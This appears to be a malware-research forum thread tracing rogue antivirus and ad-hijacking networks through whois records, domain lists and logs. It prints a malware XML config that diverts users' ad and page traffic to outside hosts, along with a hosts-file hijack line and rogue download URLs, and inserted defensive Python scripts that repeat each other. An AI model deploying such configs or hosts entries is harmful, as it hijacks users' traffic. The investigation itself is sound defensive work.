changed: bitbucket@ripe.net 20060502
changed: bitbucket@ripe.net 20060502
changed: bitbucket@ripe.net 20060508
changed: bitbucket@ripe.net 20070316
changed: bitbucket@ripe.net 20070813
changed: bitbucket@ripe.net 20080125
changed: bitbucket@ripe.net 20080125
source: RIPE

role: DenIT RIPE maintainer role
address: Denit Internet Services BV
address: Contactweg 131
address: 1014 BJ Amsterdam
address: The Netherlands
e-mail: ripe@denit.net
phone: +31 20 3371801
fax-no: +31 20 3371802
notify: ripe@denit.net
admin-c: SIMO-RIPE
tech-c: SIMO-RIPE
nic-hdl: DIT8723-RIPE
mnt-by: DENIT-IS-MNT
remarks: ------------------------------------------
remarks: Send abuse reports to: abuse@denit.net
remarks: Send security reports to: beheer@denit.net
remarks: All other mail to: info@denit.net
remarks: ------------------------------------------
changed: ripe@denit.net 20030103
changed: ripe@denit.net 20031007
source: RIPE

% Information related to '81.93.48.0/20AS25542'

route: 81.93.48.0/20
descr: Denit Networks
origin: AS25542
mnt-by: DENIT-IS-MNT
changed: jsimonetti@denit.net 20070525
source: RIPE
______________________________

Well, right now I need more time to check out all the information found today, fill out the gaps if possible and I still need to check a couple of IP ranges so I will post back if anything new shows up.
Kimberly
Remember I started with this ...

81.93.56.72 aboutstat.com A
81.93.56.74 newstat.net A
81.93.56.75 officialstat.com A
81.93.56.78 stat-diagnostic-imaging.net A
81.93.56.82 stathisranch.net A
81.93.56.84 staticglobalsources.com A
81.93.56.85 staticglobalsources.net A
81.93.56.86 station-appraisals.com A
81.93.56.87 station-appraisals.net A
81.93.56.88 statnation.net A
81.93.56.91 statsla.net A
Reflex - If you see *.com & *.net mixed, look for their vice versa.

81.93.56.73 - aboutstat.net
81.93.56.76 - officialstat.net
81.93.56.77 - stat-diagnostic-imaging.com
81.93.56.81 - stathisranch.com
Doh, bad luck for newstat.com, statnation.com and statsla.com Mr. Moon, they are already taken.

Let's fix the IP block overview first ....

81.93.56.72 aboutstat.com
81.93.56.73 aboutstat.net
81.93.56.74 newstat.net
81.93.56.75 officialstat.com
81.93.56.76 officialstat.net
81.93.56.77 stat-diagnostic-imaging.com
81.93.56.78 stat-diagnostic-imaging.net
81.93.56.79 ?
81.93.56.80 ?
81.93.56.81 stathisranch.com
81.93.56.82 stathisranch.net
81.93.56.83 ?
81.93.56.84 staticglobalsources.com
81.93.56.85 staticglobalsources.net
81.93.56.86 station-appraisals.com
81.93.56.87 station-appraisals.net
81.93.56.88 statnation.net
81.93.56.89 ?
81.93.56.90 ?
81.93.56.91 statsla.net
5 IPs left, 5 gaps to fill.

Stay tuned ... it's not gonna take me long to dig up the remaining stuff if possible.
Kimberly
Let's examine important info (outlined in red below).

Domain Name: STATION-APPRAISALS.COM
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Whois Server: whois.communigal.net
Referral URL: http://www.galcomm.com
Name Server: NS1.STATION-APPRAISALS.COM
Name Server: NS2.STATION-APPRAISALS.COM
Status: ok
Updated Date: 04-feb-2008
Creation Date: 01-feb-2008
Expiration Date: 01-feb-2009
There were 25 new domains for COMMUNIGAL.NET on 02/01/2008
  1. ABOUTSTAT.COM
  2. ABOUTSTAT.NET
  3. NEWSTAT.NET
  4. NIMOONLINE.COM
  5. NIMOONLINE.NET
  6. NIMOREX.COM
  7. NIMOREX.NET
  8. OFFICIALSTAT.COM
  9. OFFICIALSTAT.NET
  10. STAT-DIAGNOSTIC-IMAGING.COM
  11. STAT-DIAGNOSTIC-IMAGING.NET
  12. STATETSTR.COM
  13. STATGROUP.NET
  14. STATHISRANCH.COM
  15. STATHISRANCH.NET
  16. STATHOME.NET
  17. STATICGLOBALSOURCES.COM
  18. STATICGLOBALSOURCES.NET
  19. STATION-APPRAISALS.COM
  20. STATION-APPRAISALS.NET
  21. STATNATION.NET
  22. STATSITE.NET
  23. STATSLA.NET
  24. STATUAS.NET
  25. STATWORLD.NET

Which gives us the following additional domains belonging to Serg Moon.
  • 81.93.56.79 statetstr.com
  • 81.93.56.80 statgroup.net
  • 81.93.56.83 stathome.net
  • 81.93.56.88 statsite.net
  • 81.93.56.92 statuas.net
Overview.
  1. 81.93.56.72 aboutstat.com
  2. 81.93.56.73 aboutstat.net
  3. 81.93.56.74 newstat.net
  4. 81.93.56.75 officialstat.com
  5. 81.93.56.76 officialstat.net
  6. 81.93.56.77 stat-diagnostic-imaging.com
  7. 81.93.56.78 stat-diagnostic-imaging.net
  8. 81.93.56.79 statetstr.com
  9. 81.93.56.80 statgroup.net
  10. 81.93.56.81 stathisranch.com
  11. 81.93.56.82 stathisranch.net
  12. 81.93.56.83 stathome.net
  13. 81.93.56.84 staticglobalsources.com
  14. 81.93.56.85 staticglobalsources.net
  15. 81.93.56.86 station-appraisals.com
  16. 81.93.56.87 station-appraisals.net
  17. 81.93.56.88 statnation.net
  18. 81.93.56.88 statsite.net
  19. 81.93.56.91 statsla.net
  20. 81.93.56.92 statuas.net
  21. 81.93.55.178 statworld.net
"Serg Moon" owns about 19 other domains....

Remaining.
  • 81.93.56.89 ?
  • 81.93.56.90 ?
To keep an eye on.
  • 81.93.55.176
  • 81.93.55.177
  • 81.93.55.179
  • 81.93.55.180
  • 81.93.55.181
  • 81.93.55.182
  • 81.93.55.183
moon.serg@gmail.com is associated with about 28 domains....
Kimberly
Ready for another journey in advert land?

Yesterday evening Malekal_morte asked me if I knew what was creating xml files on a victim's computer. In the meantime he grabbed a copy of an xml file. Kudos for doing that.

My curiosity was immediately piqued after seeing the following:

CODE
<frameset>
<frame src="http://luckyadsols.com/?rotationid=start404&gai=4043&gli={URL}&gff=4042&uid={UID}&guid={GUID}&aid={AID}">
</frameset>

luckyadsols.com shares the same IP as waytotheprofit.com, blessedads.com and prevedmarketing.com, as seen earlier.
Other interesting elements present in the xml file are:
  • CAMPAIGN name=[name] id=[number] - there are 4 of them
  • 83.149.105.113
  • 91.184.6.104
  • pagead2\.googlesyndication\.com
  • ahahoo.com
Full code below, I just scrambled the encrypted IP. A screenshot is available here because the code is easier to follow.

CODE
<ROOT>
  <CAMPAIGNLIST>
    <CAMPAIGN name="lsd-89" id="1224201">
      <actions>
        <action type="Request">
          <newvalue><![CDATA[ GET /?t={HEADER(Host)}&aid={AID}&uid={UID}&guid={GUID} HTTP/1.1 ]]></newvalue>
        </action>
        <action type="AddRequestHeader">
          <newvalue><![CDATA[ Host: 83.149.105.113:80 ]]></newvalue>
        </action>
      </actions>
      <rules>
        <rule type="UrlKeywords"><![CDATA[ ^(http://)?(www(\.))?[a-zA-Z0-9,\-,\,]*\.[a-zA-Z0-9,\-,\,]*/$ ]]></rule>
        <rule type="ServerCheck"><![CDATA[ http://83.149.105.113:80/?t={HEADER(Host)}&aid={AID}&uid={UID}&guid={GUID} ]]></rule>
      </rules>
      <options Level="outbound" MatchInterval="604800" MatchCount="10000">
        <Recovery MatchInterval="128498101938125000" MatchCount="9999" />
      </options>
    </CAMPAIGN>
    <CAMPAIGN name="lsd-90" id="1224101">
      <actions>
        <action type="Request">
          <newvalue><![CDATA[ GET /pagead/show_ads.js?aid={AID}&uid={UID}&guid={GUID} HTTP/1.1 ]]></newvalue>
        </action>
        <action type="AddRequestHeader">
          <newvalue><![CDATA[ Host: 91.184.6.104 ]]></newvalue>
        </action>
      </actions>
      <rules>
        <rule type="RequestHeader"><![CDATA[ Host: pagead2\.googlesyndication\.com ]]></rule>
      </rules>
      <options Level="any" MatchCount="100000">
        <Recovery MatchCount="99982" />
      </options>
    </CAMPAIGN>
    <CAMPAIGN name="redir" id="1224301">
      <actions>
        <action type="Status">
          <newvalue><![CDATA[ HTTP/1.0 302 Moved Temporarily ]]></newvalue>
        </action>
        <action type="AddResponseHeader">
          <newvalue><![CDATA[ Location:  http://ahahoo.com/ph/?u={HEADER(Location)}&a={AID}&uid={UID}&guid={GUID} ]]></newvalue>
        </action>
        <action type="ReplaceCode">
          <sourcevalue><![CDATA[ <.*> ]]></sourcevalue>
        </action>
      </actions>
      <rules>
        <rule type="ResponseHeader"><![CDATA[ Location: (http://)?(www\.)?sedoparking\.com/.* ]]></rule>
        <rule type="ResponseHeader"><![CDATA[ Location: (http://)?(www\.)?meanwhile\.com/.* ]]></rule>
        <rule type="ResponseHeader"><![CDATA[ Location: (http://)?(www\.)?park\.parkingpanel\.com/.* ]]></rule>
        <rule type="ResponseHeader"><![CDATA[ Location: (http://)?(www\.)?domainhop\.com/.* ]]></rule>
        <rule type="ResponseHeader"><![CDATA[ Location: (http://)?(www\.)?mustangranch\.com/.* ]]></rule>
        <rule type="ResponseHeader"><![CDATA[ Location: (http://)?(www\.)?ndparking\.com/.* ]]></rule>
        <rule type="ResponseHeader"><![CDATA[ Location: (http://)?(www\.)?searchportal\.information\.com/.* ]]></rule>
        <rule type="RequestHeader"><![CDATA[ GET / HTTP/ ]]></rule>
      </rules>
      <options Level="any" MatchCount="100000">
        <Recovery MatchCount="100000" />
      </options>
    </CAMPAIGN>
    <CAMPAIGN name="lsd-84" id="20071226">
      <actions>
        <action type="Status">
          <newvalue><![CDATA[ HTTP/1.0 200 Ok ]]></newvalue>
        </action>
        <action type="ReplaceCode">
          <sourcevalue><![CDATA[ <.*> ]]></sourcevalue>
          <newvalue><![CDATA[
<html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
    <title>{HEADER(Host)}</title>
    </head>
    <frameset>
    <frame src="http://luckyadsols.com/?rotationid=start404&gai=4043&gli={URL}&gff=4042&uid={UID}&guid={GUID}&aid={AID}">
    </frameset>
    </html>
          ]]></newvalue>
        </action>
        <action type="AddResponseHeader">
          <newvalue><![CDATA[ Connection: close ]]></newvalue>
        </action>
      </actions>
      <rules>
        <rule type="UrlKeywords"><![CDATA[ . ]]></rule>
        <rule type="ResponseHeader"><![CDATA[ HTTP.*?404 Not Found ]]></rule>
      </rules>
      <options Level="any" MatchCount="1000">
        <Recovery MatchCount="953" />
      </options>
    </CAMPAIGN>
  </CAMPAIGNLIST>
  <COOKIES>
    <COOKIE>ip=xxxxxxxxxxxxxxxxxxxx#</COOKIE>
    <COOKIE>country=RlI#</COOKIE>
    <COOKIE>network=eHg#</COOKIE>
  </COOKIES>
</ROOT>
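Added example, my own code and not from the post or from the malware: a small extractor that walks a campaign file like the one above and lists, per CAMPAIGN, the hostnames its rules trigger on and the IPs or hosts its actions divert traffic to, which is the list you want when blocking or hunting for this thing. The embedded XML is a trimmed copy of three of the four campaigns (CDATA on single lines) so the script runs offline; the reading of the COOKIE values as base64 (country=RlI# being "FR") is mine, not something the post states.

```python
"""Extract network indicators from a traffic-rewriting campaign file."""
import base64
import re
import xml.etree.ElementTree as ET

# Trimmed copy of the file quoted above (three of its four campaigns),
# embedded so the script runs offline.
SAMPLE_XML = r"""<ROOT>
<CAMPAIGNLIST>
<CAMPAIGN name="lsd-89" id="1224201">
 <actions>
  <action type="Request"><newvalue><![CDATA[ GET /?t={HEADER(Host)}&aid={AID}&uid={UID}&guid={GUID} HTTP/1.1 ]]></newvalue></action>
  <action type="AddRequestHeader"><newvalue><![CDATA[ Host: 83.149.105.113:80 ]]></newvalue></action>
 </actions>
 <rules>
  <rule type="UrlKeywords"><![CDATA[ ^(http://)?(www(\.))?[a-zA-Z0-9,\-,\,]*\.[a-zA-Z0-9,\-,\,]*/$ ]]></rule>
  <rule type="ServerCheck"><![CDATA[ http://83.149.105.113:80/?t={HEADER(Host)}&aid={AID}&uid={UID}&guid={GUID} ]]></rule>
 </rules>
</CAMPAIGN>
<CAMPAIGN name="lsd-90" id="1224101">
 <actions>
  <action type="Request"><newvalue><![CDATA[ GET /pagead/show_ads.js?aid={AID}&uid={UID}&guid={GUID} HTTP/1.1 ]]></newvalue></action>
  <action type="AddRequestHeader"><newvalue><![CDATA[ Host: 91.184.6.104 ]]></newvalue></action>
 </actions>
 <rules>
  <rule type="RequestHeader"><![CDATA[ Host: pagead2\.googlesyndication\.com ]]></rule>
 </rules>
</CAMPAIGN>
<CAMPAIGN name="redir" id="1224301">
 <actions>
  <action type="Status"><newvalue><![CDATA[ HTTP/1.0 302 Moved Temporarily ]]></newvalue></action>
  <action type="AddResponseHeader"><newvalue><![CDATA[ Location:  http://ahahoo.com/ph/?u={HEADER(Location)}&a={AID}&uid={UID}&guid={GUID} ]]></newvalue></action>
 </actions>
 <rules>
  <rule type="ResponseHeader"><![CDATA[ Location: (http://)?(www\.)?sedoparking\.com/.* ]]></rule>
  <rule type="RequestHeader"><![CDATA[ GET / HTTP/ ]]></rule>
 </rules>
</CAMPAIGN>
</CAMPAIGNLIST>
<COOKIES>
 <COOKIE>country=RlI#</COOKIE>
 <COOKIE>network=eHg#</COOKIE>
</COOKIES>
</ROOT>"""

HOST_IN_URL = re.compile(r"https?://([A-Za-z0-9.-]+)")


def rule_hostname(pattern):
    """Reduce a 'Host: ...' or 'Location: ...' rule regex to the literal
    host it matches: drop the optional http:// and www. groups, unescape dots."""
    m = re.match(r"(?:Host|Location):\s*(.*)", pattern.strip())
    if not m:
        return None
    p = re.sub(r"\((?:http://|www\\\.)\)\?", "", m.group(1)).replace("\\.", ".")
    m = re.match(r"[A-Za-z0-9.-]+", p)
    return m.group(0) if m else None


def extract_indicators(xml_text):
    """Per campaign: hosts the rules trigger on, and where actions send traffic."""
    report = {}
    for camp in ET.fromstring(xml_text).iter("CAMPAIGN"):
        triggers, destinations = set(), set()
        for rule in camp.iter("rule"):
            if rule.get("type") in ("RequestHeader", "ResponseHeader"):
                host = rule_hostname(rule.text or "")
                if host:
                    triggers.add(host)
        for action in camp.iter("action"):
            nv = action.find("newvalue")
            text = (nv.text or "").strip() if nv is not None else ""
            if action.get("type") == "AddRequestHeader" and text.startswith("Host:"):
                destinations.add(text[5:].strip().split(":")[0])  # drop ':80'
            elif action.get("type") == "AddResponseHeader" and text.startswith("Location:"):
                m = HOST_IN_URL.search(text)
                if m:
                    destinations.add(m.group(1))
        report[camp.get("name")] = {"triggers": sorted(triggers),
                                    "destinations": sorted(destinations)}
    return report


def decode_cookies(xml_text):
    """COOKIE values are base64 with a trailing '#' (assumption from the sample)."""
    out = {}
    for c in ET.fromstring(xml_text).iter("COOKIE"):
        name, _, val = (c.text or "").strip().partition("=")
        val = val.rstrip("#")
        out[name] = base64.b64decode(val + "=" * (-len(val) % 4)).decode("latin-1")
    return out


if __name__ == "__main__":
    for name, info in extract_indicators(SAMPLE_XML).items():
        print(name, "triggers on", info["triggers"], "-> sends to", info["destinations"])
    print(decode_cookies(SAMPLE_XML))
```

Reading the output side by side with the file makes the design clear: lsd-90 rewrites every request whose Host header is pagead2.googlesyndication.com so it goes to 91.184.6.104 instead, redir turns any bounce to a domain-parking page into a 302 to ahahoo.com, and the country cookie decodes to FR, which fits a French victim.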

<h4>
The facts
</h4>
83.149.105.113

IP has no domain, but is Leaseweb. 0 Google results.
QUOTE
inetnum: 83.149.105.0 - 83.149.105.255
netname: LEASEWEB

______________________________

ahahoo.com

ICANN Registrar: RED REGISTER, INC.
Created: 2007-06-02
Expires: 2008-06-02
IP Address: 83.149.105.87
IP Location - Noord-holland - Amsterdam - Leaseweb
83.149.105.0-83.149.105.255 LEASEWEB LeaseWeb P.O. Box 93054 1090BB AMSTERDAM Netherlands

ns1.utarkasisek.net 65.243.103.51 NS
65.243.100.0-65.243.103.255 Secure Hosting Ltd. UU-65-243-100-D4 (NET-65-243-100-0-2)

hostnames sharing ip with a-records.
  • pyramidreaestate.com
  • smetsys.net
  • travelvelacity.com
domains sharing nameservers.
  • 4ocrealestate.com
  • baintravel.com
  • mp3vitan.com
  • mp3wna.net
  • pyramidreaestate.com
  • travelvelacity.com
  • utarkasisek.net
  • xsearchz.com
______________________________

91.184.6.104

IP Location: Netherlands Hostnet Bv Network
IP Address: 91.184.6.104
inetnum: 91.184.0.0 - 91.184.7.255
netname: HOSTNET-NL
descr: Hostnet BV Network
country: NL

A Google search reveals some interesting stuff ... mainly HijackThis logs, but they are always interesting to analyse. Below are the links and a couple of chosen parts.

1. http://www.infos-du-net.com/forum/277594-1...-antivirus-help

QUOTE
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com

O4 - HKLM\..\Run: [Salestart(1)] "C:\Program Files\Fichiers communs\PasenDommagement\mc.exe" dm=hxxp://pasendommagement.com ad=hxxp://pasendommagement.com sd=hxxp://paylogs.pasendommagement.com
O4 - HKLM\..\Run: [Salestart(2)] "C:\Program Files\Fichiers communs\MonContenuassistant\mc.exe" dm=hxxp://moncontenuassistant.com ad=hxxp://moncontenuassistant.com sd=hxxp://paylogs.moncontenuassistant.com
Note: pasendommagement.com and moncontenuassistant.com are some of the websites where French people are redirected by the malicious swf files.
______________________________

2. http://www.commentcamarche.net/forum/affic...-installe-bis#0

QUOTE
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com

O4 - HKLM\..\Run: [Salestart] "C:\Program Files\Fichiers communs\WinAntiVirus Pro 2007\mav_startupmon.exe"
O4 - HKCU\..\Run: [uwa7pcw] "C:\Program Files\Fichiers communs\WinAntiVirus Pro 2007\uwa7pcw.exe" -c

F:\c\Program Files\ErrorSafeScannerInstall_fr.exe -> Not-A-Virus.Downloader.Win32.WinFixer.d : Ignoré.
F:\temp\WinAntiVirusPro2007FreeInstall_fr.exe -> Not-A-Virus.Downloader.Win32.WinFixer.o : Ignoré.
F:\temp\SystemDoctor2006FreeInstall_fr.exe -> Not-A-Virus.Downloader.Win32.WinFixer.q : Ignoré.
______________________________

3. http://forums.techguy.org/malware-removal-...help-badly.html

QUOTE
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com
O1 - Hosts: 91.184.6.104 pagead2.googlesyndication.com
______________________________

4. security.ascc.sinica.edu.tw link.

Another interesting document is a Symantec writeup on Trojan.Qhosts.F
QUOTE
When the Trojan is executed it modifies the following file:
%System%\drivers\etc\hosts

It replaces the contents of the above file with the following string:
91.184.6.104 pagead2.googlesyndication.com

The change in the hosts file causes requests for advertisements from Google to be redirected to a malicious Web site. Advertisements returned by the redirected site may contain fake advertisements or malicious content.
That apparently covers CAMPAIGN name="lsd-90" id="1224101", in which we see Host: 91.184.6.104, Host: pagead2\.googlesyndication\.com and GET /pagead/show_ads.js?aid={AID}&uid={UID}&guid={GUID} HTTP/1.1
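Added example, not from the post or from Symantec: the O1 lines in the HijackThis logs above and the Trojan.Qhosts.F writeup both come down to one thing, a hosts file that points a third-party hostname at an internet-routable address. A clean hosts file only maps names to loopback (or, at most, a LAN address), so auditing for any other address catches this without needing to know the IP in advance. The hosts content below is constructed to mirror the quoted O1 entries:

```python
"""Audit a Windows hosts file for hijacked third-party hostnames."""
import ipaddress
import re

# Constructed sample mirroring the O1 lines in the quoted HijackThis logs,
# plus the harmless entries a real hosts file carries.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
0.0.0.0         ads.example.test      # a typical ad-blocking entry, harmless
91.184.6.104 pagead2.googlesyndication.com
91.184.6.104 pagead2.googlesyndication.com
"""

# address, one or more hostnames, optional trailing comment
ENTRY = re.compile(r"^\s*(\S+)\s+([^#]+?)\s*(?:#.*)?$")


def parse_hosts(text):
    """Yield (address, [hostnames]) for each mapping line, skipping comments."""
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = ENTRY.match(line)
        if m:
            yield m.group(1), m.group(2).split()


def suspicious_entries(text):
    """Return unique (ip, hostname) pairs that point a name at a routable IP.

    Loopback, unspecified (0.0.0.0 sinkholes) and RFC 1918 addresses are
    accepted as normal; anything else in a hosts file is a redirection of
    that hostname to a machine on the internet, the Qhosts pattern.
    """
    hits = {}
    for ip, names in parse_hosts(text):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            continue  # malformed address; not a hijack, just noise
        if addr.is_loopback or addr.is_unspecified or addr.is_private:
            continue
        for name in names:
            hits.setdefault((ip, name), None)  # dedupe, keep first-seen order
    return list(hits)


if __name__ == "__main__":
    for ip, name in suspicious_entries(SAMPLE_HOSTS):
        print("hosts file sends", name, "to", ip)
```

The same check works on a live machine by feeding it the contents of %System%\drivers\etc\hosts; the nine duplicate O1 lines in the first log collapse to a single finding, which is the only one that matters.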

An interesting point to remember is that at least 3 persons actually did click OK when they got redirected by the SWF files.
[Why 3 ... I see only 2 in the links you mentioned ...]
Oh, that's easy to explain, Malekal_morte's victim accepted the install of VirusEffaceur.

QUOTE
C:\Program Files
02/12/2007 13:07 <REP> VirusEffaceur
C:\Program Files\fichiers communs
12/03/2008 22:04 <REP> VirusEffaceur

c:\Documents and Settings\Famille\Application Data\install_fr[1].exe
<h4>
Thoughts about all this ...
</h4>
Is this a coincidence, a new method of updating or installing the rogue applications? Right now I don't know. I have a couple of them running and I surely saw some interesting things, but more on that later on. In the meantime I hope you enjoyed the reading.
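The hosts-file hijack quoted above is simple to check for on a machine you are cleaning. Added example, not code from the original post or from Symantec: a Python check that parses a Windows hosts file and flags a watched ad domain pointed anywhere but loopback, or any hostname pinned to a public address; the sample hosts content is constructed around the single entry quoted above.

```python
import ipaddress

# Constructed sample of a Windows hosts file. The last line is the entry the
# Symantec writeup quotes for Trojan.Qhosts.F and that the HijackThis logs
# above show as an O1 item; the first two lines stand in for normal content.
SAMPLE_HOSTS = """\
# constructed comment line, as found at the top of a default hosts file
127.0.0.1       localhost
91.184.6.104 pagead2.googlesyndication.com
"""

# Domains a workstation's hosts file should never point anywhere but loopback.
# Only the domain from this page is listed; extend it with the ad, CDN and
# update hosts that matter in your own environment.
WATCHED_DOMAINS = ("pagead2.googlesyndication.com",)


def parse_hosts(text):
    """Yield (address, hostname) pairs, ignoring comments and blank lines.

    One hosts line may carry several hostnames; each gets its own pair.
    """
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        fields = line.split()
        if len(fields) < 2:
            continue
        for name in fields[1:]:
            yield fields[0], name.lower()


def is_watched(name, watched):
    """True when name is a watched domain or a subdomain of one."""
    return any(name == w or name.endswith("." + w) for w in watched)


def suspicious_entries(text, watched=WATCHED_DOMAINS):
    """Return (address, hostname, reason) for each hosts entry worth a look.

    Loopback and unspecified targets are accepted: pointing ad domains at
    127.0.0.1 or 0.0.0.0 is what legitimate blocklists do. A watched domain
    pointed anywhere else, or any name pinned to a public address, is
    flagged; the hijack on this page needs exactly that, an ad domain
    resolved to an attacker-controlled public IP.
    """
    findings = []
    for addr_text, name in parse_hosts(text):
        try:
            addr = ipaddress.ip_address(addr_text)
        except ValueError:
            findings.append((addr_text, name, "unparseable address"))
            continue
        if addr.is_loopback or addr.is_unspecified:
            continue
        if is_watched(name, watched):
            findings.append((addr_text, name, "watched domain hijacked"))
        elif addr.is_global:
            findings.append((addr_text, name, "hostname pinned to public address"))
    return findings
```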
Kimberly
Unfortunately I didn't get any xml files, but each application is different from what I saw. It could have been a different style of advert that triggered the download of those xml files too. Seeing the domains, the same bastards are involved anyways. If I find more information about those files, I'll keep you all updated here.

As said earlier, I installed one of them and ended up with several. They pretend to update their definitions but offer a new advertisement for another rogue. But first of all a bit more about Advanced Cleaner, the first in a row I got.

It has a module called abhelp.exe which connects to the internet very often. It posts data back in binary form to 65.243.103.85.
I have no idea about the content sent out, but I wonder if it isn't logging information. It does create several registry entries like this:
QUOTE
HKEY_CURRENT_USER\Software\ORL\VNCHooks\Application_Prefs\abhlp.exe
HKEY_CURRENT_USER\Software\ORL\VNCHooks\Application_Prefs\ccApp.exe
HKEY_CURRENT_USER\Software\ORL\VNCHooks\Application_Prefs\ccLgView.exe
HKEY_CURRENT_USER\Software\ORL\VNCHooks\Application_Prefs\Explorer.EXE
HKEY_CURRENT_USER\Software\ORL\VNCHooks\Application_Prefs\gfl.exe
HKEY_CURRENT_USER\Software\ORL\VNCHooks\Application_Prefs\IEXPLORE.EXE
Since my VM started to crawl, I wanted to reboot and saw this message about WinVNC not responding ... Needless to say that I didn't like this at all.
65.243.103.85

IP Location: Bahamas Nassau Maxil Communications Ltd
IP Address: 65.243.103.85
65.243.100.0-65.243.103.255 Secure Hosting Ltd. UU-65-243-100-D4 (NET-65-243-100-0-2)
220 sh20.securehost.com ESMTP Fri, 22 Feb 2008 10:29:59 -0500 ns2.alternativerealitydomain.com A

domains using this as nameserver
alternativerealitydomain.com - 65.243.103.84
______________________________

As said, they pretend to download new definitions. They also keep a log of it. The SCNS window refers to the message box you see when you are redirected by the SWF files. The download is started directly as well. Below are a couple of snippets from the different logs. A popup window doesn't occur each time they access the internet; it depends on the reply of the server. Do not follow the links!

CODE
Sat Mar 15 19:05:11 2008    *******     Updater engine started     *******
Sat Mar 15 19:05:11 2008      
Sat Mar 15 19:05:11 2008    Command line is:
Sat Mar 15 19:05:11 2008    update @acu.dat -productversion=@appv.dat -appid=UADC
Sat Mar 15 19:05:11 2008    Engine thread was started.
Sat Mar 15 19:05:11 2008    Processing variables file: acu.dat
Sat Mar 15 19:05:11 2008    Warning: unable to read from registry: #Software\AdvancedCleaner Free\CustomerEmail
Sat Mar 15 19:05:11 2008    Warning: unable to read from registry: #Software\oid
Sat Mar 15 19:05:11 2008    Warning: unable to read from registry: #Software\AdvancedCleaner Free\suspicious
Sat Mar 15 19:05:11 2008    Sending request:  http://trial.advancedcleaner.com/?proto=3&rc=UADCFR-0001-8882-7773&v=1.0.52.2&abbr=UADCFR&platform=nt&os_version=5.1.2600.2.0&ac=8587ba19-add1-476e-8a60-a8bd7ffa737e&appid=UADC&em=&pcid=1830516028
Sat Mar 15 19:05:17 2008    Engine is exiting with return code of 24.
Sat Mar 15 19:05:17 2008    SCNS window is about to show, URL:
Sat Mar 15 19:05:17 2008    http://errclean.com/.scns/?p=10&aid=scnsuadc&lid=ges0001_10&msgid=503&acid=&
Sat Mar 15 19:10:11 2008    Downloading from SCNS started "http://bsa.safetydownload.com/sysdepannage.com/SysDepannage/setup_fr.exe" -> "C:\DOCUME~1\KLY\LOCALS~1\Temp\setup_fr.exe"
Sat Mar 15 19:10:25 2008    Downloading from SCNS returned: 1
Sat Mar 15 19:10:25 2008    SCNS window is closed.
Sat Mar 15 19:10:25 2008    *******     Updater engine finished     *******

CODE
Sat Mar 15 19:47:52 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    *******     Updater engine started     *******
Sat Mar 15 19:47:52 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}      
Sat Mar 15 19:47:52 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    Command line is:
Sat Mar 15 19:47:52 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    update @updater.dat -ProductVersion=@pv.dat -Server=@up.dat
Sat Mar 15 19:47:52 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    Engine thread was started.
Sat Mar 15 19:47:52 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    Processing variables file: updater.dat
Sat Mar 15 19:47:52 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    Warning: unable to read from registry: #Software\sysdepannage\CustomerEmail
Sat Mar 15 19:47:52 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    Warning: unable to read from registry: #Software\oid
Sat Mar 15 19:47:52 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    Warning: unable to read from registry: #Software\sysdepannage\suspicious
Sat Mar 15 19:47:52 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    Sending request:  http://uptrial.sysdepannage.com/?proto=3&rc=UGESV-0001-7772-8883&v=1.4.9.0&abbr=UGESV&platform=nt&os_version=5.1.2600.2.0&ac=EC9F078C-7BA9-4BF6-9959-37EA60C11568&em=&pcid=1830516028&sai=scnsuadc_mrt_0_fr_fr&sli=ges0001v_10&saf=&cnt=fr&lng=&tid=0001&nud=0
Sat Mar 15 19:48:11 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    Engine is exiting with return code of 24.
Sat Mar 15 19:48:11 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    *******     Updater engine finished     *******
Sat Mar 15 19:48:11 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}        
Sat Mar 15 19:48:11 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    SCNS window is about to show, URL:
Sat Mar 15 19:48:11 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    http://b2adz.com/?aid=ippugesv&msgid=661&acid=&show=0
Sat Mar 15 19:49:39 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    SCNS window is closed.

CODE
Sat Mar 15 20:19:11 2008    *******     Updater engine started     *******
Sat Mar 15 20:19:11 2008      
Sat Mar 15 20:19:11 2008    Command line is:
Sat Mar 15 20:19:11 2008    "C:\Program Files\MenaceControle\Up\gup.exe" update  -ProductVersion="@C:\Program Files\MenaceControle\Dat\pv.dat" -Appearance=Normal -AppID=UGA6PV -IntegratedMode=1 -TaskID=0 -TaskID=0
Sat Mar 15 20:19:11 2008    Engine thread was started.
Sat Mar 15 20:19:12 2008    Processing variables file: C:\Program Files\MenaceControle\Up\updater.dat
